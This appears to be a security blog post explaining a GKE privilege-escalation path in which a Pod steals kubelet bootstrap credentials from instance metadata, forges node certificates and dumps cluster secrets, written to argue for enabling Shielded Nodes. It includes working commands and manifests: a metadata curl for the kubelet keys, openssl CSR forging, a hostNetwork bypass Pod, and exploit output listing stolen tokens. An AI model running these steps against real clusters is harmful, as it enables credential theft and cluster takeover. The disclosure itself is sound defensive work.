When Shielded GKE Nodes is enabled, the GKE control plane cryptographically verifies that every node in the cluster is a virtual machine running in a managed instance group in Google’s data centers and that the kubelet is only requesting a certificate for itself. But Shielded GKE Nodes addresses a much bigger problem.
From the GKE documentation:
“Without Shielded GKE Nodes an attacker can exploit a vulnerability in a Pod to exfiltrate bootstrap credentials and impersonate nodes in your cluster, giving the attackers access to cluster secrets.”
The way this is worded is technically correct, but it only identifies one of several possible preconditions for this attack to be successful: a compromised Pod. If we dig a little deeper, we can see there are several more, and they are commonly present in most environments.
As GKE is actually a Google Cloud service that runs “on top” of Google Compute Engine, GKE Shielded Nodes leverage the underlying capabilities of GCE Shielded VMs. GKE also leverages a GCE feature called Custom Instance Metadata to host small amounts of data that the virtual machine can access via a web request to a URL reachable only from that GCE virtual machine. Specifically, this is the data needed to “bootstrap” GCE nodes so that they join the GKE cluster and show up as ready to handle GKE workloads. The custom attribute named kube-env is what holds the initial set of credentials used for this purpose.
When a GKE node (a GCE virtual machine with a specific configuration) first starts, the initial configuration scripts do several things to prepare it to be a GKE worker node, and they use the custom metadata kube-env file to obtain a list of important settings. Inside the kube-env file is a CA certificate and a public/private certificate pair. This keypair is used by the kubelet only to “bootstrap” itself. That is, the kubelet generates a new keypair and uses the keypair from kube-env to submit a CertificateSigningRequest to the API server. If the certificate request matches the proper structure and naming conventions, the GKE control plane auto-approves the node’s CSR, and the kubelet can fetch and use that new keypair to join the cluster.
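The keypair and CSR generation steps can be sketched with openssl. This is a rough, local-only illustration of the naming convention the control plane auto-approves (subject organization system:nodes, common name system:node:&lt;node-name&gt;); the node name below is hypothetical, and in the real attack it would come from the instance's own metadata.

```shell
# Hypothetical node name; the real one comes from the instance metadata.
NODE="gke-example-default-pool-abcd1234-wxyz"

# The kubelet generates a fresh EC keypair for itself...
openssl ecparam -name prime256v1 -genkey -noout -out kubelet.key

# ...and a CSR whose subject follows the convention the control plane
# auto-approves: O=system:nodes, CN=system:node:<node-name>
openssl req -new -key kubelet.key \
  -subj "/O=system:nodes/CN=system:node:${NODE}" \
  -out kubelet.csr

# Inspect the subject that would be submitted in the CertificateSigningRequest
openssl req -in kubelet.csr -noout -subject
```

The CSR would then be wrapped in a Kubernetes CertificateSigningRequest object and submitted to the API server using the bootstrap credentials.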
The default configuration of GKE clusters provides no method for blocking access to the GCE Instance Metadata. In most GKE clusters, any Pod running on a node has direct access to this metadata because, from the perspective of the Metadata API, it’s just another process running on the node:
```
root@evil-pod:/# curl -s -H "Metadata-Flavor: Google" \
  169.254.169.254/computeMetadata/v1/instance/attributes/kube-env | grep ^KUBELET
KUBELET_CERT: LS0tLS...snip...
KUBELET_KEY: LS0tLS..snip...
```
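Extracting the usable PEM material from that response is a couple of lines of shell. The snippet below is a minimal sketch using a tiny fabricated stand-in for kube-env; a real kube-env is a YAML document whose KUBELET_CERT and KUBELET_KEY values are full base64-encoded PEM blocks.

```shell
# Fabricated stand-in for the kube-env attribute. In a Pod, the real data
# would come from the metadata endpoint:
#   curl -s -H "Metadata-Flavor: Google" \
#     169.254.169.254/computeMetadata/v1/instance/attributes/kube-env
KUBE_ENV='KUBELET_CERT: aGVsbG8tY2VydA==
KUBELET_KEY: aGVsbG8ta2V5'

# Pull out and decode the base64 values into files usable as TLS credentials.
echo "$KUBE_ENV" | awk '/^KUBELET_CERT/ {print $2}' | base64 -d > kubelet-bootstrap.crt
echo "$KUBE_ENV" | awk '/^KUBELET_KEY/  {print $2}' | base64 -d > kubelet-bootstrap.key
```

With the real values, these two files are the bootstrap client certificate and key the kubelet presents to the API server.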
Second, the GKE control plane in non-Shielded Node clusters does not validate that the hostname in the CSR matches the hostname of the instance submitting it. In other words, if one can access a single node’s kubelet bootstrapping keypair, one can create valid keypairs for every node in the cluster, provided the hostnames are known.
Finally, the kubelet is responsible for running workloads, so in order to perform its intended task it needs the ability to fetch the secrets attached to any Pod currently scheduled on it.
If one could generate valid kubelet keypairs for all nodes in the cluster, they could iterate through each node and grab all the cluster secrets attached to the Pods running on it. In practical terms, that’s close to the same access provided by kubectl get secrets --all-namespaces. In nearly all clusters, at least one Kubernetes Service Account is bound to a privileged RBAC ClusterRole such as cluster-admin.
In default GKE clusters, this means that any Pod has a direct path to escalate to cluster-admin without requiring authentication. As cluster-admin, the user controls all data and applications running on the GKE workers as well as the union of all permissions associated with credentials attached to Pods running in the cluster. At best, it’s free compute. At worst, it’s a launch point for full GCP account takeover.
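As a concrete illustration of the kind of binding that makes stolen service account tokens so valuable, consider a manifest like the one below. All names here are hypothetical; the point is the pattern, which is common in clusters that run CI/CD or operator workloads.

```yaml
# Hypothetical example: a namespace's service account bound to cluster-admin.
# Any attacker holding this service account's token inherits full control.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: ci-deployer-admin
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: ci-deployer
  namespace: ci
```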
In November of 2018, this attack path was privately disclosed to the Google Vulnerability Reward Program by Darkbit’s own Brad Geesaman. That same week (coincidentally), the team at 4Armed publicly wrote up their findings on this issue. The Google VRP Team did not award a bounty as it was already identified internally as a known issue.
At the time of initial disclosure, a proof-of-concept utility named kube-env-stealer (https://github.com/bgeesaman/kube-env-stealer) was created, but it was not made public for six months, to coincide with the release of the GKE Metadata Concealment Proxy.
kube-env-stealer is a set of scripts and a Pod deployment that automates the exploitation process, starting by deploying a Pod running the nginx:latest image inside the current GKE cluster:
```
$ ./auto-exploit.sh
deployment.apps/evil-pod created
deployment.extensions/evil-pod condition met
[[ Checking if curl exists ]]
[[ Checking if awk exists ]]
[[ Checking if sed exists ]]
[[ Checking if grep exists ]]
[[ Checking if base64 exists ]]
[[ Checking if openssl exists ]]
[[ Obtain kube-env ]]
[[ Source kube-env ]]
[[ Get bootstrap certificate data ]]
[[ Get kubectl binary ]]
[[ Obtain the Hostname ]]
[[ Create nodes/gke-notshielded-default-pool-144c7d3a-4pql/openssl.cnf ]]
[[ Generate EC kubelet keypair for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Generate CSR for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Generate CSR YAML for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Submit CSR and Generate Certificate for gke-notshielded-default-pool-144c7d3a-4pql ]]
certificatesigningrequest.certificates.k8s.io/node-csr-gke-notshielded-default-pool-144c7d3a-4pql-75BB created
[[ Sleep 2 while being approved ]]
[[ Download approved Cert for gke-notshielded-default-pool-144c7d3a-4pql ]]
[[ Dumping secrets mounted to gke-notshielded-default-pool-144c7d3a-4pql ]]
Exporting secrets/default-default-token-cfpft.json
Exporting secrets/kube-system-default-token-fhlb2.json
Exporting secrets/kube-system-event-exporter-sa-token-zml6x.json
Exporting secrets/kube-system-fluentd-gcp-scaler-token-tsnc6.json
Exporting secrets/kube-system-fluentd-gcp-token-pwmsz.json
Exporting secrets/kube-system-heapster-token-dphxp.json
Exporting secrets/kube-system-kube-dns-autoscaler-token-fltl5.json
Exporting secrets/kube-system-kube-dns-token-wphxh.json
Exporting secrets/kube-system-metadata-agent-token-2x6tk.json
Exporting secrets/kube-system-metrics-server-token-w4wbh.json
Exporting secrets/kube-system-prometheus-to-sd-token-n7tlv.json
[[ Download a full pod listing ]]
[[ Get node names ]]
[[ Iterate through all other node names ]]
[[ Extracting namespace, podname, and secret listing ]]
drwxr-xr-x 0 root root      0 Aug 25 12:38 dumps/
-rw-r--r-- 0 root root 126965 Aug 25 12:38 dumps/allpods.json
-rw-r--r-- 0 root root    847 Aug 25 12:38 dumps/ns-pod-secret-listing.txt
drwxr-xr-x 0 root root      0 Aug 25 12:38 secrets/
-rw-r--r-- 0 root root   3558 Aug 25 12:38 secrets/kube-system-event-exporter-sa-token-zml6x.json
-rw-r--r-- 0 root root   3476 Aug 25 12:38 secrets/kube-system-default-token-fhlb2.json
-rw-r--r-- 0 root root   3483 Aug 25 12:38 secrets/kube-system-heapster-token-dphxp.json
-rw-r--r-- 0 root root   3551 Aug 25 12:38 secrets/kube-system-prometheus-to-sd-token-n7tlv.json
-rw-r--r-- 0 root root   3508 Aug 25 12:38 secrets/kube-system-fluentd-gcp-token-pwmsz.json
-rw-r--r-- 0 root root   3565 Aug 25 12:38 secrets/kube-system-fluentd-gcp-scaler-token-tsnc6.json
-rw-r--r-- 0 root root   3483 Aug 25 12:38 secrets/kube-system-kube-dns-token-wphxh.json
-rw-r--r-- 0 root root   3533 Aug 25 12:38 secrets/kube-system-metadata-agent-token-2x6tk.json
-rw-r--r-- 0 root root   3576 Aug 25 12:38 secrets/kube-system-kube-dns-autoscaler-token-fltl5.json
-rw-r--r-- 0 root root   3448 Aug 25 12:38 secrets/default-default-token-cfpft.json
-rw-r--r-- 0 root root   3533 Aug 25 12:38 secrets/kube-system-metrics-server-token-w4wbh.json
deployment.apps "evil-pod" deleted
```
The entire process takes roughly 20-60 seconds depending on the number of nodes in the cluster, and the only required permission is pod create in any namespace.
At the time, the GKE Metadata Concealment Proxy was the stop-gap fix. Its functionality was later wrapped into Workload Identity. Essentially, it blocked Pods from accessing the sensitive Metadata API endpoints such as the kube-env attribute.
However, if no Admission Control is in place, a Pod that specifies running on the host network can still access the Instance Metadata API as before and bypass both of these solutions.
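A minimal sketch of that bypass follows. With hostNetwork: true, the Pod shares the node's network namespace, so protections applied to Pod-network traffic no longer sit between the Pod and the metadata endpoint. The Pod and image names are hypothetical.

```yaml
# Hypothetical Pod that bypasses metadata concealment by joining the
# node's network namespace. Requests to 169.254.169.254 from this Pod
# are indistinguishable from the node's own.
apiVersion: v1
kind: Pod
metadata:
  name: hostnet-pod
spec:
  hostNetwork: true
  containers:
  - name: shell
    image: nginx:latest
```

This is exactly the class of Pod spec that an Admission Control policy would need to reject.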
As mentioned in the beginning of this post, a Pod is only one way to gain access to the GCE Instance Metadata. There are other IAM Roles that can grant direct access to the GCE Instance Metadata Attributes without having to be a Pod inside the cluster. Namely, anyone granted a role containing compute.instances.get in the same project as the cluster can also read kube-env directly from the GCP API:
```
$ gcloud compute instances describe gke-notshielded-default-pool-144c7d3a-4pql
..snip..
id: '4278918789669244206'
kind: compute#instance
..snip..
metadata:
  items:
  ..snip..
  - key: kube-env
    value: |
      ..snip..
      CA_CERT: LS0tLS1..snip..
      KUBELET_CERT: LS0tLS1..snip..
      KUBELET_KEY: LS0tLS1..snip..
      ..snip..
  kind: compute#metadata
name: gke-notshielded-default-pool-144c7d3a-4pql
..snip..
status: RUNNING
zone: https://www.googleapis.com/compute/v1/projects/gke-c2/zones/us-central1-c
```
If a malicious user compromises other valid credentials with this permission and the GKE API Server is network-accessible or “public” (also a default configuration), they can perform the same attack without needing to be inside the cluster. This variant is handled by a slightly modified script that is also available in the kube-env-stealer repository.
Enter GKE Shielded Nodes. Aside from all of its validation benefits, the key change is that kube-env no longer holds the sensitive kubelet bootstrapping credentials. Those are now distributed via the vTPM chip running on the hardware and are only accessible to privileged processes on the node.
Per the GKE Shielded Nodes documentation, Shielded Nodes will be the default starting in GKE 1.18. As of this writing, the latest possible version in the rapid channel is 1.17, so it is not the default just yet. However, you can enable GKE Shielded Nodes in your cluster starting with GKE 1.13.6-gke.0 as an upgrade operation or when creating a new cluster.
The GKE platform has recently closed a serious privilege escalation path present in most default GKE clusters, and GKE customers should strongly consider enabling GKE Shielded Nodes to improve the defense-in-depth posture of their GKE environment.